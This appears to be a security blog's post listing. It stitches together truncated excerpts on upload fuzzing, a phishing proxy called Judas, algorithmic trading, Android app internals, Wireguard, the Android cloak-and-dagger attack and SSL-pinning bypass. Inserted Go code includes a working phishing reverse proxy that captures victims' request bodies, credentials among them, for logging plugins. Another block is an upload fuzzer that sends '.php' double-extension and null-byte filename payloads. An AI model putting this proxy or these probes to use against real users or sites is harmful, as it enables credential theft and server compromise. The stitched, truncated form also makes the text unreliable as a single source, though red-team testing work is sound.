Apps and websites often need to let users upload files. Sometimes users need to upload arbitrary files, as with general-purpose storage services such as S3, but most of the time a service expects a specific type of file: your bank might want a photo of your passport for KYC purposes, TikTok expects a video, and so on. Unrestricted file uploads expose web applications to risks ranging from complete system takeover to attacks forwarded to back-end systems and client-side attacks, so uploaded files need to be handled with care.
In cases where a service is expecting a specific kind of file…
So you’ve been given a web app to pentest. Maybe it’s a banking app or a document workflow system. Either way, you need to make sure it’s secure. Modern web applications have a large attack surface, and testing everything by hand is inefficient. That’s where fuzzers come in handy. A fuzzer generates new inputs by mutating a seed and feeds them to the program under test, and fuzzing can quickly show areas that are worth further examination.
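As an added example (not code from this post), here is a minimal mutation-based fuzzer for a file upload endpoint in Go. It varies the filename, the declared Content-Type and the file bytes of a seed, wraps each case in a multipart upload and records how the server answers. The seed is a constructed PNG header, `StrictUploadHandler` is a hypothetical stand-in for the application under test, and the case names and the form field name `file` are assumptions:

```go
package main

import (
	"bytes"
	"fmt"
	"io"
	"math/rand"
	"mime/multipart"
	"net/http"
	"net/textproto"
	"strings"
)

// SeedPNG is a constructed seed: the PNG signature followed by the start of an IHDR chunk.
var SeedPNG = []byte{0x89, 'P', 'N', 'G', '\r', '\n', 0x1a, '\n', 0, 0, 0, 13, 'I', 'H', 'D', 'R'}

// UploadCase is one candidate upload derived from the seed.
type UploadCase struct {
	Name, Filename, ContentType string
	Body                        []byte
}

// GenerateCases varies the three things a server-side check usually inspects: filename,
// declared Content-Type and the bytes themselves. Bit flips are reproducible from rngSeed.
func GenerateCases(seed []byte, filename string, rngSeed int64, flips int) []UploadCase {
	cases := []UploadCase{
		{"baseline", filename, "image/png", seed},
		{"double-extension", filename + ".php", "image/png", seed},
		{"wrong-content-type", filename, "text/html", seed},
		{"null-byte-name", filename + "\x00.php", "image/png", seed},
		{"empty-body", filename, "image/png", nil},
		{"signature-stripped", filename, "image/png", seed[8:]},
	}
	rng := rand.New(rand.NewSource(rngSeed))
	for i := 0; i < flips; i++ {
		m := append([]byte(nil), seed...) // mutate a copy, never the seed
		pos := rng.Intn(len(m))
		m[pos] ^= 1 << uint(rng.Intn(8))
		cases = append(cases, UploadCase{fmt.Sprintf("bitflip-%d@%d", i, pos), filename, "image/png", m})
	}
	return cases
}

// BuildMultipart encodes a case as multipart/form-data, the way a browser form would.
func BuildMultipart(c UploadCase, field string) ([]byte, string, error) {
	var buf bytes.Buffer
	w := multipart.NewWriter(&buf)
	h := textproto.MIMEHeader{
		"Content-Disposition": {fmt.Sprintf(`form-data; name="%s"; filename="%s"`, field, c.Filename)},
		"Content-Type":        {c.ContentType},
	}
	part, err := w.CreatePart(h)
	if err != nil {
		return nil, "", err
	}
	part.Write(c.Body) // writes into buf; cannot fail
	if err := w.Close(); err != nil {
		return nil, "", err
	}
	return buf.Bytes(), w.FormDataContentType(), nil
}

// RunCases posts every case to uploadURL and records the HTTP status per case name. Compare
// each status with the baseline: a mutated upload the server accepts, or any 5xx, is where to dig.
func RunCases(client *http.Client, uploadURL string, cases []UploadCase) (map[string]int, error) {
	results := make(map[string]int, len(cases))
	for _, c := range cases {
		body, ctype, err := BuildMultipart(c, "file")
		if err != nil {
			return nil, err
		}
		resp, err := client.Post(uploadURL, ctype, bytes.NewReader(body))
		if err != nil {
			return nil, err
		}
		io.Copy(io.Discard, resp.Body)
		resp.Body.Close()
		results[c.Name] = resp.StatusCode
	}
	return results, nil
}

// StrictUploadHandler is a constructed stand-in for the app under test: it accepts only *.png
// filenames whose body starts with the PNG signature and never reads the declared Content-Type,
// so the wrong-content-type case is accepted, which tells you which checks the server really does.
func StrictUploadHandler(w http.ResponseWriter, r *http.Request) {
	f, hdr, err := r.FormFile("file")
	if err != nil {
		http.Error(w, "bad form", http.StatusBadRequest)
		return
	}
	defer f.Close()
	data, _ := io.ReadAll(f)
	if !strings.HasSuffix(strings.ToLower(hdr.Filename), ".png") || !bytes.HasPrefix(data, SeedPNG[:8]) {
		http.Error(w, "rejected", http.StatusBadRequest)
		return
	}
	w.WriteHeader(http.StatusNoContent)
}
```

Against a real target, point `RunCases` at the application's upload URL and give it an `http.Client` whose `Transport` has `Proxy` set to Burp, so every case also lands in the proxy history. Replace the seed with a real file of the expected type, since a mutator can only be as good as its seed.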
If you’ve been reading my blog since the start, you’ll remember Judas, the pluggable open-source phishing proxy. I wrote Judas to prove a point on an engagement once, and unfortunately neglected it afterwards. (Side note: Go’s comprehensive standard library makes it easy to toss together a proof of concept on an engagement). I’ve had a lot more time to write code in lockdown so I decided to show Judas some love.
Judas is a reverse proxy for red team phishing engagements based on Go’s httputil.ReverseProxy. …
We’ve all heard about algorithmic trading in the news. It sounds great! You think of a program making money for you while you sip Mai Tais and smoke the finest ganja on the beach in Jamaica. I’m going to show you how you can do it yourself with TD Ameritrade and a laptop.
Before we start, you need to know that great reward comes with great risk. Don’t do this with money you’re not willing to lose.
The first thing you’ll need is a TD Ameritrade account. You don’t need to be a US citizen to get an account, and…
Smartphones have become an extension of our bodies. We use mobile apps for everything from sending money to shooting movies, but for the most part, apps are black boxes. On Android, apps can request information about installed apps and their components from the PackageManager. You can see what an Android app is made of using APK Explorer.
Every Android version comes with Easter Eggs, hidden apps that are interesting to some enthusiasts. APK Explorer makes finding Easter Eggs easy, by displaying them in the list of apps instead of having to search through random tap combinations in the Android UI.
I’ve been experimenting with Wireguard as a VPN to protect my internet traffic from local snoopers and communicate between all my devices as if they were on the same network.
Wireguard was designed with mobile devices in mind. It uses battery-friendly cryptography and the protocol can handle endpoints that change IP address seamlessly. It is ideal for exposing local development servers on my laptop to my iPhone, but deploying configuration to a device is a manual and time-consuming process.
The cloak and dagger attack exploits a combination of drawing over other apps and the high level of access to other apps given to accessibility services on Android. It is a simple yet effective technique being exploited in the wild today by cybercriminals.
The cloak and dagger attack takes advantage of two Android permissions:
SYSTEM_ALERT_WINDOW is used to draw over other Android apps. If an app installed from the Play Store requests this permission in its AndroidManifest.xml file, it will automatically be granted by the system. This forms the first building block of the…
Your target has an Android application and you want to walk through their API to check for server-side vulnerabilities. You configure the emulator to use Burp Suite as a proxy and begin using the app.
Suddenly, the app stops working. Nothing shows in Burp and no HTTPS requests work. The developers have implemented SSL pinning, and the app rejects Burp’s certificate because it doesn’t match the pinned one. Fortunately, SSL pinning can be disabled if you’re willing to get your hands dirty.
First, you need to decompile the app. Apktool works great for this, and it’s available on all…
Postman is an excellent API testing tool for developers, QA testers and penetration testers. Its UI allows you to easily send HTTP requests and see responses, but it’s also a great automation tool.
In the last post, Judas got SOCKS proxy and SSL support to make the proxy sneakier, but all the proxy can do is dump the requests and responses to the console. What if the red teamer wants to send the requests to a logging REST API? Luckily, Go’s plugin standard library package can help.
To make plugins work, we first need to define a contract for plugins to implement. Plugins may need to do some kind of setup, like reading configuration from command line flags, and they will need to process each HTTP request-response transaction.
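As an added example, not Judas’s own code, here is one way to express that contract in Go, covering both the httputil.ReverseProxy core described earlier and the plugin hook described here. The `Plugin` interface has the two responsibilities just named: `Initialize` registers its flags before the flag set is parsed, and `ProcessTransaction` is called once per request/response pair. `LoadPlugin` shows how a plugin built with `go build -buildmode=plugin` would be pulled in; the interface shape, the `Transaction` fields, the `-log-verbose` flag and the convention that a plugin exports a variable named `Plugin` are all assumptions made for this example:

```go
package main

import (
	"bytes"
	"flag"
	"fmt"
	"io"
	"net/http"
	"net/http/httputil"
	"net/url"
	"plugin"
	"sync"
)

type Transaction struct {
	Method, Path string
	Status       int
	RequestBody  []byte
}

// Plugin is the contract. This two-method shape is an assumption made for the
// example, not the interface Judas actually defines.
type Plugin interface {
	Initialize(fs *flag.FlagSet) error       // register and read flags before parsing
	ProcessTransaction(tx Transaction) error // called once per request/response pair
}

// MemoryLogPlugin keeps transactions in memory; a real one would POST them to a logging API.
type MemoryLogPlugin struct {
	verbose *bool
	mu      sync.Mutex
	Seen    []Transaction
}

func (p *MemoryLogPlugin) Initialize(fs *flag.FlagSet) error {
	p.verbose = fs.Bool("log-verbose", false, "print every transaction")
	return nil
}

func (p *MemoryLogPlugin) ProcessTransaction(tx Transaction) error {
	p.mu.Lock() // ServeHTTP runs concurrently, so the slice needs a lock
	p.Seen = append(p.Seen, tx)
	p.mu.Unlock()
	if p.verbose != nil && *p.verbose {
		fmt.Printf("%s %s -> %d (%d request bytes)\n", tx.Method, tx.Path, tx.Status, len(tx.RequestBody))
	}
	return nil
}

// LoadPlugin opens a shared object built with `go build -buildmode=plugin` and expects
// it to export a package-level variable named Plugin (an assumed convention).
func LoadPlugin(path string) (Plugin, error) {
	so, err := plugin.Open(path)
	if err != nil {
		return nil, err
	}
	sym, err := so.Lookup("Plugin") // Lookup returns a pointer to an exported variable
	if err != nil {
		return nil, err
	}
	pp, ok := sym.(*Plugin)
	if !ok {
		return nil, fmt.Errorf("%s: Plugin symbol has type %T, want *Plugin", path, sym)
	}
	return *pp, nil
}

type statusRecorder struct {
	http.ResponseWriter
	status int
}

func (s *statusRecorder) WriteHeader(code int) { s.status = code; s.ResponseWriter.WriteHeader(code) }

type Proxy struct {
	rp      *httputil.ReverseProxy
	plugins []Plugin
}

func NewProxy(target *url.URL, plugins []Plugin) *Proxy {
	rp := httputil.NewSingleHostReverseProxy(target)
	director := rp.Director
	rp.Director = func(r *http.Request) {
		director(r)
		r.Host = target.Host // present the real site's Host upstream, not the phishing domain
	}
	return &Proxy{rp: rp, plugins: plugins}
}

func (p *Proxy) ServeHTTP(w http.ResponseWriter, r *http.Request) {
	body, _ := io.ReadAll(r.Body) // keep a copy for plugins; a real proxy would cap this
	r.Body = io.NopCloser(bytes.NewReader(body))
	rec := &statusRecorder{ResponseWriter: w, status: http.StatusOK}
	p.rp.ServeHTTP(rec, r)
	tx := Transaction{r.Method, r.URL.Path, rec.status, body}
	for _, pl := range p.plugins {
		_ = pl.ProcessTransaction(tx) // a failing plugin must not break the victim's session
	}
}
```

Plugins are called after `ReverseProxy.ServeHTTP` returns, so they see the final status and the full request body without interfering with the response the victim receives. Note that `statusRecorder` hides the `http.Flusher` and `http.Hijacker` methods of the underlying writer, which a proxy for streaming or WebSocket traffic would need to forward explicitly.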